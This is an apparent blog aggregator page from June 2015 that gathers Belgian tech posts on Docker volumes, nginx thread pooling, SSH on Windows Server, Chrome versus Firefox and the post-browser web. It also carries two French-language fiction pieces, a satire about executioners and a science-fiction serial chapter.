Docker provides volumes to pass storage from the host into a container. Basically you map a path on the host to a path inside the container. But this raises some questions: how do I share this when a new container gets started? How can I make sure this is secure? How do I manage all these volumes? What is the best way to share them among different hosts? ...

One way to consolidate your volumes is to use "data-only" containers. This means that you run a container with some volumes attached to it and then link to them from other containers so they all use a central place to store data. This works but has some drawbacks imho.
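For reference, the pattern looks roughly like this (the images, paths and container names are made up for the example):

# Create a stopped "data-only" container that owns the volume
docker create -v /var/lib/mysql --name dbdata busybox true

# Any container that needs the data mounts it via --volumes-from
docker run -d --name db1 -e MYSQL_ROOT_PASSWORD=secret --volumes-from dbdata mysql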

This container just needs to exist (it doesn't even need to be running), and as long as this container or a container that links to it exists, the volumes are kept on the system. Now, if you accidentally delete the container holding the volumes, or you delete the last container linking to them, you lose all your data. With containers coming and going, it can become tricky to keep track of this, and making mistakes at this level has some serious consequences.

Security

Docker images

One of the "advantages" that Docker brings is the fact that you can pull images from the Docker hub and from what I have read this is in most cases encouraged. Now, everyone I know who runs a virtualization platform will never pull a Virtual Appliance and run it without feeling dirty. when using a cloud platform, chances are that you are using prebuild images to deploy new instances from. This is analogue to the Docker images with that difference that people who care about their infrastructure build their own images. Now most Linux distributions provide an "official" Docker image. These are the so called "trusted" images which I think is fine to use as a base image for everything else. But when I search the Docker Hub for Redis I get 1546 results. Do you trust all of them and would you use them in your environment?

What can go wrong with pulling an OpenVPN container, right?

This is also an interesting read: https://titanous.com/posts/docker-insecurity

User namespacing

Currently there's no user namespacing which means that if a UID inside the docker container matches the UID of a user on the host, that user will have access to the host with the same permissions. This is one of the reasons why you should not run processes as the root user inside containers (and outside). But even then you need to be careful with what you're doing.

Containers, containers, containers..

When you run more and more stuff in containers, you'll end up with a few hundred, a few thousand or even more containers. If you're lucky they all share the same base image. And even if they do, you still need to update them with fixes and security patches, which results in newer base images. At this point all your existing containers should be rebuilt and redeployed. Welcome to the immutable world...

So the "problem" just shifts up a layer. A Layer where the developers have more control over what gets added. What do you do when the next OpenSSL bug pops up? Do you know which containers has which OpenSSL version..?

Minimal OS's

Everyone seems to be building these mini OS's these days, like CoreOS, ProjectAtomic, RancherOS, etc. The idea is that updating the base OS is a breeze (reboot, A/B partitions, etc.) and all the services we need run inside containers.

That's all nice, but people with a sysadmin background will quickly start asking questions like: can I do software RAID? Can I add my own monitoring on this host? Can I integrate it with my storage setup? etc...

Recap

What I wanted to point out is that when you decide to start using containers, keep in mind that this means you'll need to change your mindset and be ready to learn quite a few new ways of doing things.

While Docker is still young and has some shortcomings I really enjoy working with it on my laptop and use it for testing/CI purposes. It's also exciting (and scary at the same time) to see how fast all of this evolves.

I've been writing this post on and off for some weeks and recently some announcements at Dockercon might address some of the above issues. Anyway, if you've read until here, I want to thank you and good luck with all your container endeavors.

by Vincent Van der Kussen at June 21, 2015 10:00 PM

Wim Leers

Eaton & Urbina: structured, intelligent and adaptive content

While walking, I started listening to Jeff Eaton’s Insert Content Here podcast, episode 25: Noz Urbina Explains Adaptive Content. People must’ve looked strangely at me because I was smiling and nodding — still walking :) Thanks Jeff & Noz!

Jeff Eaton explained how the web world looks at and defines the term WYSIWYG. Turns out that in the semi-structured, non-web world that Noz comes from, WYSIWYG has a totally different interpretation. And they ended up renaming it to what it really was: WYSIWOO.

Jeff also asked Noz what “adaptive content” is exactly. Adaptive content is a more specialized/advanced form of structured content, and in fact “structured content”, “intelligent content” and “adaptive content” form a hierarchy:

In other words, adaptive content is also intelligent and structured; intelligent content is also structured, but not all structured content is also intelligent or adaptive, nor is all intelligent content also adaptive.

Basically, intelligent content better captures the precise semantics (e.g. not a section, but a product description). Adaptive content is about using those semantics, plus additional metadata (“hints”) that content editors specify, to adapt the content to the context it is being viewed in. E.g. different messaging for authenticated versus anonymous users, or different nuances depending on how the visitor ended up on the current page (in other words: personalization).

Noz gave an excellent example of how adaptive content can be put to good use: he described how he had arrived in Utrecht in the Netherlands after a long flight, “checked in” to Utrecht on Facebook, and then Facebook suggested to him 3 open restaurants, including cuisine type and walking distance relative to his current position. He felt like thanking Facebook for these ads — which obviously is a rare thing, to be grateful for ads!

Finally, a wonderful quote from Noz Urbina that captures the essence of content modeling:

How descriptive do we make it without making it restrictive?

If it isn’t clear by now — go listen to that podcast! It’s well worth the 38 minutes of listening. I only captured a few of the interesting points, to get more people interested and excited.1

What about adaptive & intelligent content in Drupal 8?

First, see my closely related article Drupal 8: best authoring experience for structured content?.

Second, while listening, I thought of many ways that Drupal 8 is well-prepared for intelligent & adaptive content. (Drupal already does structured content by means of Field API and the HTML tag restrictions in the body field.) Implementing intelligent & adaptive content will surely require experimentation, and different sites/use cases will prefer different solutions, but:

I think that those two modules would be very interesting, useful additions to the Drupal ecosystem. If you are working on this, please let me know — I would love to help!


  1. That’s right, this is basically voluntary marketing for Jeff Eaton — you’re welcome, Jeff! 

by Wim Leers at June 21, 2015 06:08 PM

June 19, 2015

Frank Goossens

Music from Bruxelles ma belle Tube: Casssandra

Now that I found Gilles Peterson’s WorldWide as a podcast on Radio Nova I’m once again enjoying the nuggets Gilles disperses to his worldwide audience. A couple of weeks ago he played “Sifflant Soufflant” by Casssandre (yes, 3 s’es, must be a Belgian thing), a Belgian jazz singer. While looking for that specific track on YouTube did not yield a result, I did find this live video, which is part of a series of performances recorded in beautiful places in Brussels:

YouTube Video
Watch this video on YouTube or on Easy Youtube.

So there you have it; 2 nuggets in one go. Enjoy your weekend!

by frank at June 19, 2015 05:39 AM

June 18, 2015

Mattias Geniar

Increasing Nginx Performance With Thread Pooling

The post Increasing Nginx Performance With Thread Pooling appeared first on ma.ttias.be.

Fascinating stuff.

The result of enabling thread pooling and then benchmarking the change shows some pretty impressive performance gains.

Now our server produces 9.5 Gbps, compared to ~1 Gbps without thread pools!

and

The average time to serve a 4-MB file has been reduced from 7.42 seconds to 226.32 milliseconds (33 times less), and the number of requests per second has increased by 31 times (250 vs 8)!

The title of the article seems wrong, as a best-case scenario can increase bandwidth roughly 10x and serve a file 33 times faster (under the best of circumstances).

Worth a read and definitely worth a test in your lab: Thread Pools in NGINX Boost Performance 9x!
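If you want to try it in your own lab, the configuration side is tiny; a sketch based on the thread_pool and aio directives documented by nginx (1.7.11 or newer; the pool name, sizes and paths are placeholders to adjust for your workload):

events {}

# Main context: define a pool of worker threads
thread_pool default threads=32 max_queue=65536;

http {
    server {
        listen 80;

        location /downloads/ {
            root /storage;
            # Offload blocking disk reads for large files to the thread pool
            aio threads=default;
        }
    }
}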

The post Increasing Nginx Performance With Thread Pooling appeared first on ma.ttias.be.

by Mattias Geniar at June 18, 2015 08:00 PM

How SSH In Windows Server Completely Changes The Game

The post How SSH In Windows Server Completely Changes The Game appeared first on ma.ttias.be.

A few days ago, Microsoft announced their plans to support SSH.

At first, I only skimmed the news articles and misinterpreted the news as PowerShell getting SSH support to act as a client, but it appears this goes much deeper: SSH coming to Windows Server is both client and server support.

A popular request the PowerShell team has received is to use Secure Shell protocol and Shell session (aka SSH) to interoperate between Windows and Linux – both Linux connecting to and managing Windows via SSH and, vice versa, Windows connecting to and managing Linux via SSH.
Looking Forward: Microsoft Support for Secure Shell (SSH)

While the announcement in and of itself is worth a read, the comments show a lot of concern into the how of the implementation, hoping for industry standard implementations instead of quirky forks of the protocol.

In the comments, the official PowerShell account also confirms that the SSH implementation will have both client and server support.

The SSH implementation will support both Client and Server.

This is super exciting.

SSH Public Key Authentication

SSH is just a protocol. Windows already has several protocols & methods for managing a server (RPC, PowerShell, AD Group Policies, ...), so why bring another one?

Supporting the SSH server on Windows can bring the biggest advancement to Windows in a long time: SSH public key authentication.

Historically, managing a Windows server was either based on username/password combinations or NTLM. There are other alternatives, but these 2 are the most widely used. You either type your username and password, or you belong to an Active Directory domain for easier access.

Managing standalone Windows machines has therefore always been a serious annoyance. It requires keeping a list of username/password combinations.

If SSH support in Windows is done right, it would mean a new authentication method that is perfect for automation tasks.
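That authentication method is the same public key workflow Linux admins already use everywhere else; a minimal sketch (the key file name, user and host are illustrative):

# Generate a key pair once
ssh-keygen -t ed25519 -f ~/.ssh/winserver_ed25519

# Install the public key on the target (this is the part a Windows SSH server would have to support)
ssh-copy-id -i ~/.ssh/winserver_ed25519.pub admin@winserver.example.com

# From then on, scripts can log in without a password prompt
ssh -i ~/.ssh/winserver_ed25519 admin@winserver.example.com 'hostname'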

It inevitably also means that supporting SSH on Windows isn't trivial: it ties into the user management, authentication & authorization. This would be a major feature to push out.

Config Management For Windows

Configuration Management isn't new for Windows. In fact, in many regards, automating state and configuration is far more advanced in Windows than it is on Linux.

However, the tools to automate on Windows have mostly been proprietary, complex and very expensive to both purchase and maintain. In the Open Source world there are many alternatives for config management a user could choose from.

For a couple of years now, even the Open Source tools have begun to show rudimentary support for managing Windows Server (ref.: Puppet, Chef, Ansible, ...).

Having SSH access to a Windows Server with proper SSH public key support would allow all kind of SSH-based config management tools to be used for managing a Windows Server, whether it's in an Active Directory domain or a standalone server.

Even if Ansible didn't have native Windows support, just having SSH available would be sufficient to use Ansible to completely manage a Windows server.
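Purely as a hypothetical illustration of that point: once an SSH daemon answers on the Windows box, even a raw Ansible call over plain SSH would be enough to run a command there (the host name and user are made up, and again, this does not exist today):

# Ad-hoc command over SSH, no agent or WinRM required
ansible all -i 'winserver.example.com,' -u admin -m raw -a "ipconfig /all"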

Imagine the power.

The Proof Of The Eating Is In The Pudding

Hmmm, pudding ...

Sorry, I digress.

As Microsoft has correctly admitted, this is the 3rd attempt to integrate SSH into Windows.

The first attempts were during PowerShell V1 and V2 and were rejected. Given our changes in leadership and culture, we decided to give it another try and this time, because we are able to show the clear and compelling customer value, the company is very supportive.

A public statement proclaiming support for native SSH is a powerful thing, but it's by no means a guarantee that it'll happen. The lack of a clear timeline also shows how early in the process this idea is.

I'm hoping SSH server support in Windows Server eventually becomes a standard on every server. I'm biased because I come from a Linux background, but having an SSH server with public key authentication would greatly simplify my life when automating Windows environments.

There are alternatives for doing that. There have always been alternatives. I just don't like them. I like having SSH access to manage a server and I'm rooting for Microsoft to pull this off as well.

The post How SSH In Windows Server Completely Changes The Game appeared first on ma.ttias.be.

by Mattias Geniar at June 18, 2015 07:27 PM

Joram Barrez

Activiti 6 Launch Recordings online

The Activiti Community Day in Paris last week was a blast. The venue, the talks, the attendees … all were top notch. For the people that weren’t able to attend this time (I’m sure you had good excuses … right?), don’t worry. We’ve recorded most of the sessions (and the slides are already online a couple […]

by Joram Barrez at June 18, 2015 11:37 AM

Frederic Hornain

[The Enterprisers Project] How to improve the ways internal employees interacted with IT.

The Enterprisers Project

 

 

 

 

Sometimes, such little things can considerably improve efficiency.
That is what we call an Enterprising moment.

 

 

Ref : https://enterprisersproject.com/

KR
/f


by Frederic Hornain at June 18, 2015 06:31 AM

Sébastien Wains

Verify expiration date for a local x509 certificate

Use this command:

openssl x509 -noout -in /etc/pki/tls/certs/client.crt -dates

Output would be:

notBefore=Feb 20 16:20:08 2015 GMT
notAfter=Feb 20 16:20:08 2016 GMT
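The same check also works against a live server, by piping the certificate that openssl s_client retrieves into openssl x509 (the hostname below is just an example):

echo | openssl s_client -connect www.example.org:443 2>/dev/null | openssl x509 -noout -dates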

June 18, 2015 04:00 AM

Switching back from Chrome/Chromium to Firefox and a global rant about Google

I've used Chrome (and Chromium, depending on the platform; from now on I'll refer to both as Chrome) pretty much since it went out of beta.

I started to get annoyed with the last few versions though.

It all started when I tried to install an application on a Windows 7 machine (I wasn't using an admin account at the time). That app contained malware not detected by the antivirus (I wasn't 100% confident it was clean, though). It installed a couple of Chrome extensions that were redirecting traffic to ads and opening popups.

Trying to get rid of it was challenging. If you removed the extension in the extension manager, it would appear again at the next start-up. I tried Shield for Chrome but it wasn't helpful: it would just uninstall the extension, which would reappear upon the next restart. This was actually because Chrome was starting with flags that loaded extensions located on the filesystem. Run chrome://version and look at the command line; you will see the directories being loaded.

On the other hand, Chrome has been very good at removing an extension that Google considered "harmful". The extension is called "Download Youtube Chrome" (DYC), and you can only install it by downloading it from the web and installing it as an unpacked extension. Of course, this extension lets you download YouTube videos, so apparently copyright infringement is more harmful than actual malware potentially spreading on thousands of machines.

Even before the DYC episode, I was using another extension for downloading YouTube videos: "Video Downloader Professional". It worked great until Google decided to remove offending extensions from their store, and by offending they probably meant copyright-offending (I commute a lot with poor reception, so I download videos for offline viewing).

And even before that, Google started to implement many new features that make Chrome today twice as big as Firefox (comparison based on OS X): profile management (chrome://flags/#enable-new-profile-management), OK Google voice search (this thing is listening to you constantly if enabled, and any OK Google recording is saved in Google's cloud, though you can delete them), desktop notifications.

You used to be able to specify where desktop notifications would appear, but Google decided to remove the feature, so you have to stick with notifications in the upper right corner of your screen, an area that you are very likely to click (the Wi-Fi picker, for example). I can't count how many times I have wrongly clicked on the stupid notification that just popped up in my face, triggering an action.

This goes along with default settings enabling translation and location (well, you get a popup asking if you want to share your location or if you want to translate the page), and those tend to slow down the browser considerably (I'm talking about a late 2008 MacBook here).

I had a couple of bookmarks synced in their "cloud" by signing in. I protected that with my Google password at the time, but today I have a new password and I still need to remember my old one whenever I install Chrome on a new machine. I haven't found how to manage that password (I didn't search much, though; it should be an obvious option).

Lastly, it has been reported that Chromium silently downloads binaries related to voice upon every start on Linux Debian. See http://www.theregister.co.uk/2015/06/17/debian_chromium_hubbub/ and https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=786909

So all in all, Chrome has become a memory hog, and Google is controlling your browser in an unprecedented way. They will push or remove whatever features or design they wish, whenever they wish, and don't care about what you think.

And if you believe that the supposedly open source project gives you a voice in the design and implementation, see this link talking about the decision to hide http:// from the URL bar when it's not secured by SSL: https://code.google.com/p/chromium/issues/detail?id=41467

See this comment particularly: https://code.google.com/p/chromium/issues/detail?id=41467#c19

Chromium UI design is not a democracy and is not based on users' votes ~ Peter Kasting

The problem with Chrome's design is so significant that some people even petitioned against Kasting and the UI team: https://www.change.org/p/lawrence-page-replace-peter-kasting-and-the-google-chrome-ui-team

Well, at least they haven't given in to the new trend (started by Apple and Safari) of hiding the path from the URL in the address bar. How soon though, Peter?

I'm now switching back to Firefox; the last time I used it on a daily basis, it was version 3 or so. What is it now? Version 38. Holy cow, time flew.

If only Chrome was the only problem with Google.

They are trying to force Google+ down our throats in the nastiest ways (you have to have a G+ account to upload YouTube videos, you can't comment on Android applications without G+, etc.).

They shut down major applications like Reader, probably as a way to increase traffic to G+, but it failed big time. They should at least have integrated it into G+; instead they lost those users.

iGoogle was neat too. Too good, probably (my dad loved it); they had to kill it.

They are forcing Hangouts on people who still use Google Talk. Every once in a while, Gmail will switch to Hangouts without notice. Thanks, I'm now using competing products.

I'm done with the force-feeding attitude of Google, which got so powerful that they think their vision of the web should be pushed (silently) to users. They know that a vast majority of users just take things as they come and don't question what they are presented with. They also feel free to pull the plug on popular services to serve their goal of winning the social network business. Give up already, Google: 90% of users never posted anything on your G+ toy: https://www.stonetemple.com/real-numbers-for-the-activity-on-google-plus/

June 18, 2015 04:00 AM

June 17, 2015

Frank Goossens

HTML/ Javascript/ multimedia-extravaganza essay about code

Paul Ford’s “What is Code” on Bloomberg Business is a comprehensive and utterly superb essay/ course/ HTML-javascript-multimedia-extravaganza about IT, computer history, programming languages, development, frameworks, version control, testing, shipping projects and much, much more. The entire text is licensed under Creative Commons (by-nc-nd) and all of it is up on GitHub to fork or simply admire.

Thanks for sharing Nicolas :-)

by frank at June 17, 2015 11:25 AM

June 16, 2015

Mark Van den Borre

His song is over. His instrument is silent forever. He has passed away. He is no more.

by Mark Van den Borre (noreply@blogger.com) at June 16, 2015 10:23 AM

Mattias Geniar

Kickstarter Now Available In Belgium

The post Kickstarter Now Available In Belgium appeared first on ma.ttias.be.

I'm curious what we Belgians can achieve with a platform like Kickstarter.

kickstarter_belgium

We’re thrilled to announce that Kickstarter is now available to creators in five more European countries: Austria, Belgium, Italy, Luxembourg, and Switzerland. Starting today, artists, inventors, designers, and makers of all types can launch projects on Kickstarter and share them with our global community.
Welcoming Belgium to the Kickstarter Community!

We've always been able to back projects, but as of today we can start them as well. There are a lot of creative minds here in this little country -- amaze us, please!

The post Kickstarter Now Available In Belgium appeared first on ma.ttias.be.

by Mattias Geniar at June 16, 2015 10:03 AM

June 15, 2015

Mattias Geniar

uBlock Origin Now Blocking Access To SourceForge

The post uBlock Origin Now Blocking Access To SourceForge appeared first on ma.ttias.be.

The SourceForge giant is going down.

uBlock Origin is a popular ad blocker and "privacy protector". I've been using it as an AdBlockPlus replacement ever since it came out. And as of today, it has started to block access to the SourceForge website.

Visitors that use uBlock are greeted with the following message.

ublock_sourceforge_block

This is no doubt a result of the recent actions taken by SourceForge: bundling adware in the Windows installer of Gimp.

SourceForge has long since been replaced by GitHub for many; this is just another nail in the coffin.

The post uBlock Origin Now Blocking Access To SourceForge appeared first on ma.ttias.be.

by Mattias Geniar at June 15, 2015 02:11 PM

June 14, 2015

Mattias Geniar

HHVM Performance Lockdown: Is HHVM Reaching Its Limit?

The post HHVM Performance Lockdown: Is HHVM Reaching Its Limit? appeared first on ma.ttias.be.

The latest HHVM blogpost is all about getting performance gains from HHVM in real-life situations. While MediaWiki saw a noticeable increase, the other frameworks are stalling.

Is HHVM reaching its performance limit?

These were the results of the week-long effort focussed on increasing the performance of HHVM, showing the throughput of Drupal, WordPress & MediaWiki after the improvements were implemented.

hhvm_lockdown_performance

MediaWiki got a nearly 20% improvement, but WordPress & Drupal remained the same.

Earlier on, the HHVM team had already worked together with MediaWiki to assist in their migration from PHP to HHVM; this additional knowledge may have helped in gaining the 20% performance boost.

In the lockdown, we were able to improve MediaWiki performance by 19.4%, and WordPress by 1.8%. Unfortunately, Drupal wins were no longer measurable once the Drupal database was patched to fix the aforementioned plugin bug.

But equally important, HHVM remains faster than PHP.

Across the board we found that HHVM performs best on applications where CPU time is maximized. In particular we’re 1.55 times faster than PHP 7 on a MediaWiki workload, 1.1 times faster on a Drupal 7 workload, and 1.19 times faster on a WordPress workload.

As none of these frameworks take advantage of the asynchronous I/O architecture available in HHVM (i.e., async), it’s not surprising that the greatest performance benefits come from the efficient execution of PHP code possible with a JIT compiler.

These are the latest benchmark figures, as run by the HHVM team, comparing HHVM to the latest PHP builds.

hhvm_performance_comparison

I should take the time to redo my PHP vs HHVM performance benchmark from last year, since a lot has changed in both PHP and HHVM in the meantime.
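For reference, the kind of comparison I have in mind is nothing fancy: the same application served once by PHP-FPM and once by HHVM, hammered with a simple HTTP benchmark. A minimal sketch, assuming a test box with the two stacks listening on different ports (the URL and ports are placeholders):

# Same WordPress install, served by PHP-FPM on :8080 and by HHVM on :8090
ab -n 1000 -c 10 http://wordpress.test:8080/
ab -n 1000 -c 10 http://wordpress.test:8090/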

The entire HHVM performance lockdown blogpost is worth a read and goes into great technical detail.

But with all these performance tweaks, most users will only notice a 1-5% increase in their applications. Could this mean HHVM has reached its limit when it comes to improving PHP's raw performance?

While the benefits of async I/O are unique to HHVM and could further increase performance greatly, these kinds of features aren't yet available to us common PHP users due to the lack of compatibility in the main PHP engine.

The post HHVM Performance Lockdown: Is HHVM Reaching Its Limit? appeared first on ma.ttias.be.

by Mattias Geniar at June 14, 2015 10:15 AM

June 12, 2015

Lionel Dricot

The executioner's argument

6277699374_12b9604b64_z

It was not so long ago, in a time when the air was pure and forests covered our country. The water of the streams was clear and people died of a toothache at thirty.

The village was flourishing and renowned throughout the county for the know-how of its inhabitants: most of them were executioners, from father to son.

Each family had its specialty. Making people suffer slowly. Extracting confessions quickly. Torturing spectacularly. Killing efficiently and painlessly. The latter were particularly appreciated by the public administration. In any case, each family had its clientele, its history, its heritage and its pride. The village exported its expertise throughout the country and even beyond!

One summer day, a strange rumor spread through the village. The government was said to be secretly studying the ratification of a charter of human rights. This charter included the outright abolition of the death penalty, whether quick or long and painful. Likewise, the charter would prohibit torture throughout the territory.

The village was, of course, strongly opposed to this charter. It meant outright economic ruin. The end of a centuries-old tradition, of an art passed down from generation to generation.

The village was often held up as an example in the political debates, which frequently degenerated into violent demonstrations.
— The people of the village have to make a living! said some.
— How do you expect to offer professional retraining to these hundreds of families? added others.
— You may disagree with them, but they are only doing their job! hammered still others.

The student movement took up the cause of the charter. After a few bloody excesses, the ringleaders were arrested and sentenced to death. The executioner who came from the village happened to be a young man who had traveled a lot. Before striking the fatal blow, he discreetly addressed his victims.
— You know, I think you are right. We cannot kill people; progress requires abolishing the death penalty. I wanted to thank you for your fight. May I shake your hand?
— But aren't you going to kill us?
— What can I say, it's my job. I have no choice. But my heart is entirely with you.

The executioner carried out his work without arguing. The surviving students made him a symbol and thanked him for his humanity and his courage.

He became a mediator between the two sides and put an end to the conflict with a now-famous speech.

"Killing people and making them suffer is a barbaric custom. We agree that progress can only be built on respect for human beings. Humanity can only move forward by defending the integrity of every individual.

However, entire families are heirs to a thousand-year-old tradition. They have invested in training and in state-of-the-art equipment. They live, drink, eat and consume. They keep the economy running. Don't they have the right to live too? Don't they have the right to see their work respected?

Putting a human being to death does not please me. But it is a necessary evil in order to sustain society and the individuals who make it up."

The executioner's argument hit home. Admittedly, the use of executioners became less and less popular. Nobody paid for their services or to attend an execution anymore. Executions became free and were sponsored by big food and drink brands. Despite a notable drop in crime, the state encouraged judges to be harsh and launched a large subsidy plan for executioners who, without it, would probably no longer exist today.

So, when someone explains to you that your work is useless or even harmful, when they claim that society needs to move on, remember the executioner's argument: it's your job. You have no choice. And there are dozens of people like you who make a living from this work. Some are too old to hope for retraining. They have the right to live. So, even if it is harmful, dangerous, useless or stupid, even if you don't really agree with what you are doing, you have to defend those who, like you, have the courage to obey and do their job without asking questions.

 

Photo by Joan G. G.

 

Thank you for taking the time to read this freely priced post. Feel free to support me with a few milliBitcoins, a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.

Flattr this!

by Lionel Dricot at June 12, 2015 03:05 PM

June 11, 2015

Frank Goossens

Music from Our Tube; Boxed In(dia)

Didn’t know “Boxed In“, but this is a nice song, and the clip was apparently filmed on location at a laughter therapy club in Calcutta, India (I work for an Indian IT services company, so I can relate immensely):

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 11, 2015 01:08 PM

June 09, 2015

Dries Buytaert

The post-browser era of the web is coming

At yesterday's Worldwide Developer Conference keynote, Apple announced its annual updates to iOS, OS X, and the new watchOS. As usual, the Apple rumor blogs correctly predicted most of the important announcements weeks ago, but one important piece of news only leaked a few hours before the keynote: the launch of a new application called "News". Apple's News app press release noted: "News provides beautiful content from the world's greatest sources, personalized for you".

Apple basically cloned Flipboard to create News. Flipboard was once Apple's "App of the Year" in 2010, and it remains one of the most popular reading applications on iOS. This isn't the first time Apple has chosen to compete with its ecosystem of app developers. There is even a term for it, called "Sherlocking".

But forget about Apple's impact on Flipboard for a minute. The release of the News app signifies a more important shift in the evolution of the web, the web content management industry, and the publishing industry.

Impact on content management platforms

Why is Apple's News app a big deal for content management platforms? When you can read all the news you are interested in inside News, you no longer have to visit websites for it. It's a big deal because there are half a billion active iOS devices and Apple will ship its News app to every single one of them. It will accelerate the trend of websites becoming less relevant as end-point destinations.

Some of the other new iOS 9 features will add fuel to the fire. For example, Apple's search service Spotlight will also get an upgrade, allowing third-party services to work directly with Apple's search feature. Spotlight can now "deep link" to content inside a website or application, further eliminating websites or applications as end-points. You could search for a restaurant in Yelp directly from your home screen, and go straight to Yelp's result page without having to open the Yelp website or application. Add to that the Apple Watch, which doesn't even ship with a web browser, and it's clear that Apple is about to accelerate the post-browser era of the web.

The secret to the News app is the new Apple News Format; rumored to be an RSS-like data feed with support for additional design elements like images, videos, custom fonts, and more. Apple uses these feeds to aggregate content from different news sources, uses machine learning to match the best content to a given user, and provides a clean, consistent look and feel for articles coming from the various news sources. That is the long way of saying that Apple decides what the best content is for you, and what the best format is to deliver it in. It is a profound change, but for most people this will actually be a superior user experience.

The release of Apple News is further proof that data-driven experiences will be the norm, and of what I have been calling The Big Reverse of the Web: the idea that for the web to reach its full potential, it will go through a massive re-architecture from a pull-based to a push-based architecture. After the Big Reverse of the Web is complete, content will find you, rather than you having to find content. Apple's News and Flipboard are examples of what such push-based experiences look like; they "push" relevant and interesting content to you rather than you having to "pull" the news from multiple sources yourself.

When content is "pushed" to you by smart aggregators, using a regular web browser doesn't make much sense. You benefit from a different kind of browser for the web. For content management platforms, it redefines the browser and websites as end-points; de-emphasizing the role of presentation while increasing the importance of structured content and metadata. Given Apple's massive install base, the launch of its News app will further accelerate the post-browser era of the web.

I don't know about your content management platform, but Drupal is ready for it. It was designed for a content-first mentality while many competitive content management systems continue to rely on a dated page-centric content model. It was also designed to be a content repository capable of outputting content in multiple formats to multiple end-points.

Impact on publishing industry

Forget the impact on Flipboard or on content management platforms, the impact on the publishing world will even be more significant. The risk for publishers is that they are being disintermediated as the distribution channel and that their brands become less useful. It marks a powerful transformation that could de-materialize and de-monetize much of the current web and publishing industry.

Because of Apple's massive installed base, Apple will now own a large part of the distribution channel and it will have an outsized influence on what hundreds of millions of users will read. If we've learned one thing in the short history of the Internet, it is that cutting out middlemen is a well-known recipe for success.

This doesn't mean that online news media have lost. Maybe this can actually save them. Apple could provide publishers large and small with an immense distribution channel by giving them the ability to reach every iOS user. Apple isn't alone with this vision, as Facebook recently rolled out an experiment with select publishers like Buzzfeed and the New York Times called Instant Articles.

In a "push economy" where a publisher's brand is devalued and news is selected by smart aggregators, the best content could win; not just the content that is associated with the most well-known publishing brands with the biggest marketing budgets. Publishers will be incentivized to create more high-quality content -- content that is highly customized to different target audiences, rather than generic content that appeals to large groups of people. Success will likely rely on Apple's ability to use data to match the right content to each user.

Conclusion

This isn't necessarily bad. In my opinion, the web isn't dead, it's just getting started. We're well into the post-PC era, and now Apple is helping to move consumers beyond the browser. It's hard to not be cautiously optimistic about the long-term implications of these developments.

by Dries at June 09, 2015 08:38 AM

June 08, 2015

Lionel Dricot

Printeurs 31

3558322825_79fd90cc28_z
This is post 31 of 31 in the Printeurs series

How long have I been shut in here without moving? Since that mythical instant I call birth. How long... But what is time, if not a perception, a sensation, a pain? Time is life draining drop by drop from our body. Time is nothing but distilled suffering, a torment that gives us the impression of existing.

The white dots dance before my eyes. The blue sphere grows. I am alone facing the universe. Safe at last. For the first time in my life, I am certain that I am not going to be beaten, that I am not going to be insulted. A strange feeling. I close my eyes. When I open them again, the blue sphere has filled my field of vision. I close them again. Shocks shake my body, my stomach knots, a furious noise floods and overwhelms me while I roast under an intense heat. I close my eyes, I scream and I welcome the pain like an old friend gone for too long. My eyes roll back and I disappear into a torrent of infinite blackness.

The silence wakes me with a start. My whole body seems to weigh a ton and drags me toward the floor. With difficulty, I extract myself from the ship and start crawling across the floor. Lit by a pale orange light, the hangar I find myself in seems gigantic. Turning my head, I discover a wide opening looking out on a luminous sphere. My asteroid? No, it is not that round. Probably another one, filled, like mine, with factories, workers and guards. But there is no doubt that my ship came in through that opening.

I get rid of the spacesuit. Breathing is easier, but I still feel strangely heavy. The silence surprises me. Is nobody coming to take delivery of the cargo? After dragging myself behind a crate, I curl up, hoping to keep watch without being seen.

Voices wake me. A bright, harsh light now floods the hangar. Two men approach. Two tall, upright men. They pass close to my hiding place and I have time to examine their faces. They are handsome. Their hair and their teeth are orderly. They walk briskly while talking. The older one radiates confidence and experience. His hair is graying and yet he speaks and moves like a young man. Their accent is hard for me to understand and their vocabulary mostly escapes me. But I catch the gist of their discussion.

— All these workers seem well treated to me. Sure, their work is repetitive and not very fulfilling, but maybe that is what suits them. Why do you absolutely want to replace them with printers?
— Don't be naive, Nellio. All those people you saw with nice blue caps, blue gloves and a blue apron do strictly nothing. They are tele-pass who are made to believe they are working.
— But I saw them screwing parts together, assembling things...
— Of course. One department assembles parts, a second one takes them apart and a third one handles transport between the first two.
— But why? What is the point?
— To reduce the number of tele-pass.
— That's absurd!
— Why? The tele-pass want work. The workers want fewer tele-pass being paid to do nothing. Everyone is happy.
— But in that case, Georges, why did you create a foundation for the well-being of the workers? Don't tell me it's just for your image?
— There is a bit of that, it's true. Power also needs puppet counter-powers to keep minds busy and to deter the deepest rebellions. Since religion fell into decay, we have had to fall back on the media and the unions.
— What? But... So you are nothing but scum?

The young man has stopped and is looking at the older one with barely contained fury. I feel a wave of violence, of hatred, rising. Inwardly, I look forward to the show. But, to my great surprise, the older man casts a single glance, accompanied by a smile.

— Come on, Nellio. You must suspect that if I brought you here, it is because I have far nobler motives.

Incredible! This man also seems to have the Power. Or at least a variant of it. He is dangerous. Very dangerous!

— What I just told you is the official version, the one that allowed me to get this far without arousing suspicion. The one that allowed me to discover a nameless horror that the printer can put an end to.
— Don't try to confuse me, Georges!
— Think, Nellio: why did I bring you here, if not to convince you? Where do you think we are?
— It looks like an underground base for automated space freighters. Like this one. A real museum piece that must date from the era of the space mines.
— Exactly!
— As a child, I dreamed of traveling in space, of becoming an astronaut, whether as a miner or as a toilet unclogger. I did not yet know that all space exploitation had been abandoned. Not profitable enough.
— That is indeed what you can read on the historical sites. Nice propaganda.
— Because it isn't true?
— Look at this ship, it arrived last night.
— What? But...
— It is loaded with goods.
— Huh?

The two men have entered the ship. I try to get closer, but their voices no longer reach me. Who are they? And what are they doing here? Will the Power have any effect on them? The older one worries me.

They come back out, holding a plastic doll in their hands.
— But these toys are completely outdated. No child uses them anymore these days.
— Yes, this ship puzzles me. It comes from coordinates we haven't ordered from in a long time. Their products no longer sell.
— What do you mean, George? What are you talking about?
— I still have a lot to figure out. All I know is that when a factory needs a shipment of a given product, it fills a ship with food rations and sends it off with coordinates determined by the desired product. When it comes back, the freighter is full.
— How is that possible? Who fills the freighter?
— To this day I have no certainty, but every hypothesis I can come up with is more terrible than the last.
— I know! The prisoners! I remember that a few years ago, those convicted of serious crimes were shipped off to the abandoned mining asteroids. A form of death penalty that could be morally justified in the media and that had caused a scandal among the students.
